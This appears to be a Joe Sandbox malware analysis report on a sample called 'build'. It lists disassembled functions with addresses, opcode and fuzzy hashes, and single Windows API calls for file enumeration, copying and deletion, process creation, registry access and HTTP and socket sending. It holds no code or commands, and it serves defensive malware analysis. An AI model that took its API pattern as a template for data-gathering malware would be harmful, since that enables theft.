Opcode ID: 8ca45ac23f5f80d14643078be58b4809d258a7f24a3690ed9c8315075ae20a95
Instruction ID: 9197950a34bd4c976d15aab42ed2e9430d39523bc9f36c003b53b492bb8b4f1e
Opcode Fuzzy Hash: 8ca45ac23f5f80d14643078be58b4809d258a7f24a3690ed9c8315075ae20a95
Instruction Fuzzy Hash: 3D1130B56101049FDB44EF6DEC82A6F77E8EB8A258B04403DE809C7311D738EE159B69

Function 004131B8 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE(?,?), ref: 00413298

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 3a29d8ca63820d5722b582f667db8b337fae8528adca656499e5a846500da76d
Instruction ID: 46ee3b8e51b98a700c03f76e3129104915c10ea7453c9402c637743a23bd37a1
Opcode Fuzzy Hash: 3a29d8ca63820d5722b582f667db8b337fae8528adca656499e5a846500da76d
Instruction Fuzzy Hash: FD2131B6A007099FC745CF68DC81BD9B3B1FF99304F048629D959D7211EB30BA68CB95

Function 00428AD8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE(?,?), ref: 00428B8D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: cd3aa1e78e9bafe1509456a5680c28c2fd7ad0762637759b60c567d48fb9704d
Instruction ID: f05d9e3c906a89cc39a28d3f1c3c1cdf9eccc8e36dd42beb386d9ba1c5efffb7
Opcode Fuzzy Hash: cd3aa1e78e9bafe1509456a5680c28c2fd7ad0762637759b60c567d48fb9704d
Instruction Fuzzy Hash: 0B21D675E007598FEB51CF68D880AAABBF0BB48200F01856AD959E7311E734AA85CF94

Function 004281A3 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0002B95A,?,00000000,00000000), ref: 004281F4

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9f766c61395a17931d0f1b18f2dfe0ebdacd91c9f8f739b9e91bdfc8bef2e541
Instruction ID: 333401f703d56baabf777b19cb238a4d8652f21cbd007379918289329deaa6e8
Opcode Fuzzy Hash: 9f766c61395a17931d0f1b18f2dfe0ebdacd91c9f8f739b9e91bdfc8bef2e541
Instruction Fuzzy Hash: BD11A1B6340244AFD314DB5CECD1E6AB3E9EFC4209B190539E55AC3361DA34BE18CB28

Function 0040F621 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE(?,?), ref: 0040F6B3

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: a7703d518600a256b01e6be35bebfad8b62186e0db01ff4d5707e6f2c8d3ec17
Instruction ID: f292f0bd4e0c0730813694860e680219b469247554fa056f98eb1f0cfd166385
Opcode Fuzzy Hash: a7703d518600a256b01e6be35bebfad8b62186e0db01ff4d5707e6f2c8d3ec17
Instruction Fuzzy Hash: D011737A7402048BCB00DF9CDDC1BD973B6BF89314F044668A919DB356DA74EA68CB89

Function 0041FC37 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0041FC8B

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: d67a27c9b99dd7a5bcb955ccc47490bdb7cbe0b4d5b421f5d9e7404f74ea9cfb
Instruction ID: 567a26385f976fdb7e9c64f1dd9d30ac251e2d642bf6d4e3b564833a4be22e49
Opcode Fuzzy Hash: d67a27c9b99dd7a5bcb955ccc47490bdb7cbe0b4d5b421f5d9e7404f74ea9cfb
Instruction Fuzzy Hash: F2F0F0B66002006FD324EF2DDC81E5B7BA8EBCA714F00413CB25AD3390DA34A904C769

Function 00407189 Relevance: 1.5, APIs: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(?), ref: 00407197

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CloseHandleInternet
String ID:
API String ID: 1081599783-0
Opcode ID: 9d7e6391d205012e130f3f3ea228e23d68f5f77aea07e94926cd98718c3223a4
Instruction ID: 3adff67efb32840669713f8a0c5f684ed6112579c969e8e8afcce97dc2c94f89
Opcode Fuzzy Hash: 9d7e6391d205012e130f3f3ea228e23d68f5f77aea07e94926cd98718c3223a4
Instruction Fuzzy Hash: 97018CB6A001449FCF04CB98DC90F9E73B9EFC9340B144024E819F7711D639AE018BA4

Function 0040785A Relevance: 1.5, APIs: 1, Instructions: 36networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET ref: 0040788B

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 128fc794dd7df37090889cde7c700cc9ebf5d29e3d1e2b8f998b75ac21f5148c
Instruction ID: bf0f034a3dd850cf0cb564b24178683266c6b6b51357b7988c54eadef3e04e74
Opcode Fuzzy Hash: 128fc794dd7df37090889cde7c700cc9ebf5d29e3d1e2b8f998b75ac21f5148c
Instruction Fuzzy Hash: 74F0AF766002859BD314DF38EC91FAA73E9EB8E304F058668B615D72D2EA30AD50CB14

Function 00401124 Relevance: 1.5, APIs: 1, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 0040116F

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3fdf45d8cf678b361a808c94b8cc7572885393971de760a12fde78d5daa8ab18
Instruction ID: f3b03884cb52d199f356ad5dd5f3a1ff2906ecf3ed5d74594d059c0442db3dd9
Opcode Fuzzy Hash: 3fdf45d8cf678b361a808c94b8cc7572885393971de760a12fde78d5daa8ab18
Instruction Fuzzy Hash: 07F05EB5304204AFD304EB29EC96E2F76AEEBC629CB09412CF645D7251CAB09D109725

Function 00409D4A Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,00000010), ref: 00409D9B

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: connect
String ID:
API String ID: 1959786783-0
Opcode ID: a0b9c6951ddee27bfd121741c426206ffc976de5c3bda4e77bf4ae948fd768d7
Instruction ID: 1c76ee57f995fb73f56d176aba3e3fe730563ee54a1c86628c8c5cf679eeabc3
Opcode Fuzzy Hash: a0b9c6951ddee27bfd121741c426206ffc976de5c3bda4e77bf4ae948fd768d7
Instruction Fuzzy Hash: D0014678240300DFD328CF59DD84E1AB3E6AF88304B18882DA5AAC7392C678E804CB19

Function 0040658C Relevance: 1.5, APIs: 1, Instructions: 34networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 004065D3

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: b5efd7d13abf80949e0d98f68c3f819bcdfda6731efe7baf540d0d921052d973
Instruction ID: db716060e8ae9f8fcc5e862a0cebcb454ceb0093ee65c84773531da29eefcbe9
Opcode Fuzzy Hash: b5efd7d13abf80949e0d98f68c3f819bcdfda6731efe7baf540d0d921052d973
Instruction Fuzzy Hash: E5F0F9B6B01115DFCF08CBA8DC9097EBBB6BF89254718002DA406D33A1CA305C11DB48

Function 0041E5BA Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 0041E5F9

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f66ba3a97befe56bb46f98ddc1edee4028ac782d80761f6c23770a61df238c97
Instruction ID: 0fa74fcbbd74ccd1cf866cb18b277c58b46efe67117f2375fa274a71e14e3a6a
Opcode Fuzzy Hash: f66ba3a97befe56bb46f98ddc1edee4028ac782d80761f6c23770a61df238c97
Instruction Fuzzy Hash: 52F08C7D6803029BC314EF6ADCC0A46B7EAFF99318755082DA593C3752DA38A841CB69

Function 0040BC40 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0040BC81

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 94c759a8ce41bf2e0de2e2b8980983596a01c6efcb84545c265453e26e10f652
Instruction ID: 6670c946d57bb98f83207a2e2a4dd8fc4f459805bc578e4bde3d9dfa9d5bd7d2
Opcode Fuzzy Hash: 94c759a8ce41bf2e0de2e2b8980983596a01c6efcb84545c265453e26e10f652
Instruction Fuzzy Hash: ADF0F631A043058BC304EF2CDD8095577F1FFC5614F44852CE88483262EA30EA56C7C6

Function 0041E504 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 0041E518

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bc003e0033e343d7ba4dec19045f45bd8d3e8025bf33d3d776cd7bc3a0ad43a3
Instruction ID: cbd043872ff42a4671465c5ece64a3fa1dab85f27f9690b3f564dbc24f64846f
Opcode Fuzzy Hash: bc003e0033e343d7ba4dec19045f45bd8d3e8025bf33d3d776cd7bc3a0ad43a3
Instruction Fuzzy Hash: FDF03076680302DFC3109FEADC9090677EAEFD5B147654429E155C7261DA78F8528718

Function 00428B6F Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE(?,?), ref: 00428B8D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 1cbed7a68a4fd64f4a3c6965399a7e26c25b9176cb7031c005de184faee0bea6
Instruction ID: 9528cd4afdda23467e0083a937059f108ced78d3526648939f428abbaa092546
Opcode Fuzzy Hash: 1cbed7a68a4fd64f4a3c6965399a7e26c25b9176cb7031c005de184faee0bea6
Instruction Fuzzy Hash: D5F0E277E00149AFEF01CB88EC90ADC77B5EB91204F054071E919E3260D739AE4A8F84

Function 00409CA9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00409CF5

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 9578f0d61e1449aacc03a36e68f72606a615a669d3faf548841a9fdb8cf3b8d6
Instruction ID: 05f6202e1bc20cb4b29bb86db7e74d39b969980e396a867aade4093ea41b7757
Opcode Fuzzy Hash: 9578f0d61e1449aacc03a36e68f72606a615a669d3faf548841a9fdb8cf3b8d6
Instruction Fuzzy Hash: 4DF06DB1A44344DFE710CF64CCC4B9AB7E4FF85308F05C529A858D7202E7B4A9948B51

Function 00413142 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000), ref: 0041315E

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 8c1172f1069cd386c8498d50835f691b8d700a6194f4737e5d350dae5d27791d
Instruction ID: 23ef3dd95bf6a0164c47cf999acec1c42eb63bf94e27a0aeafc3b0acf90d2c1f
Opcode Fuzzy Hash: 8c1172f1069cd386c8498d50835f691b8d700a6194f4737e5d350dae5d27791d
Instruction Fuzzy Hash: 75F0A0BAB405648BCB09D758DCA1ABC37E3ABC9305B080059C905A7751CA786D61DA4D

Function 0040B98E Relevance: 1.5, APIs: 1, Instructions: 26processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32 ref: 0040B9D1

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b8df199aab9badff020bc2b1227722152c72f420ecf84555ae2651d7957e55b5
Instruction ID: 8b4a8257022abbb41a3118302225be22bdba0b02c73ba330e27b8c205def3af7
Opcode Fuzzy Hash: b8df199aab9badff020bc2b1227722152c72f420ecf84555ae2651d7957e55b5
Instruction Fuzzy Hash: E8F0F9B5A087018BD70CDF29C9906A9B7F0BF9D304F00C96DA899D3361EA30DA45CF05

Function 00412EF8 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00412F23

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 2954db867639c53f90c80a99d2f2c9786d5699ed2f9d976f1843ad7852b205c3
Instruction ID: b7c71d53dac44b228edffe1a05e153bdbe68826ecec0f01bcc8b446e4b1f0614
Opcode Fuzzy Hash: 2954db867639c53f90c80a99d2f2c9786d5699ed2f9d976f1843ad7852b205c3
Instruction Fuzzy Hash: 0AF030BAB001058FD748CB6CDC91B9D73E7EFD8309B184128A405D7365EA71ED56CB44

Function 0040C871 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C89C

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: d14a2ba5cc82fcc1864902cf64a2bea3494f77a9fcd36c36f244b44799870a20
Instruction ID: 1daf45191db6c52babe1fe8c8a27866bb4fb13e0f71ca1e9aaeaddf3e781aff4
Opcode Fuzzy Hash: d14a2ba5cc82fcc1864902cf64a2bea3494f77a9fcd36c36f244b44799870a20
Instruction Fuzzy Hash: 63E06DBAB412008BC71CFF68ECA4F6A33A5EB96740B08402CA802C33D4DD609911CA4A

Function 0040A36D Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,00000000,00000000,00000000), ref: 0040A398

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: c86cb437a16923ba70a9f6b55ded9f8956fbf0d8b58b57c2774321bcb1cc0512
Instruction ID: f7f0187726c946ab94bd7783febf1ef7e1263ef785280c0f7cc2a8f968373833
Opcode Fuzzy Hash: c86cb437a16923ba70a9f6b55ded9f8956fbf0d8b58b57c2774321bcb1cc0512
Instruction Fuzzy Hash: 6AE09275380200DFD750EB6CCC80B2933E5AB88358F040524F225D73E2C638AE518B5A

Function 004095F3 Relevance: 1.5, APIs: 1, Instructions: 24filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000FFF,?), ref: 004095AA

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 8ddbed3e19b3c5e16b329f61f458e941262536b44169388930885874bfec931b
Instruction ID: 793b8917542ee9cb27708f1ec57fc827c82194574f1446412d7664dbd63c4935
Opcode Fuzzy Hash: 8ddbed3e19b3c5e16b329f61f458e941262536b44169388930885874bfec931b
Instruction Fuzzy Hash: 14E0657A348201EFD340CB5DDC84F6AB3E89B88644F180428A00AC3392CA74EC00DB2A
